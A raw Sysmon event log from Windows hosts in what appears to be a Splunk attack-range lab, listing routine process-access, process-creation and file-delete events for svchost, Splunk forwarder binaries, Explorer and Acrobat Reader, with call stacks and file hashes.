12:30:29.022{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.022{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.022{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.022{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E664-63C7-9306-00000000AF02}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.007{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E664-63C7-9306-00000000AF02}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.834{FE4C2B44-E664-63C7-9306-00000000AF02}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000047690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.931{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF55A3B0F1DDC35E291C8B498BF9910,SHA256=4F9D7496784D4EE82D887C0C284C88EE76DEDE6991A4C080BB0DF3BD62582156,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018829Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.509{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E666-63C7-3E02-00000000B002}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018828Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.508{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018827Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.508{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018826Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018825Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018824Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018823Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018822Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018821Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018820Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.507{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018819Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.506{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E666-63C7-3E02-00000000B002}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018818Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.506{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E666-63C7-3E02-00000000B002}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018817Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.505{E5A8D418-E666-63C7-3E02-00000000B002}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018816Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.457{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19324288249359CCAB620955392C386A,SHA256=F6E758AD7591CDD0A66359977CE3D75C011251318B1B7DDEAB0D5D7D0379567A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018815Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.144{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E46A873BCE4E5683598D4F1637CDD6,SHA256=47B32F5C75A431127A2918A0626A62DA2A8B48EEFF0FEA09AD7CD6D84C4994AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018814Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.035{E5A8D418-E665-63C7-3D02-00000000B002}35922720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.810{FE4C2B44-E666-63C7-9506-00000000AF02}56445536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.667{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.667{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.666{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.651{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.651{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 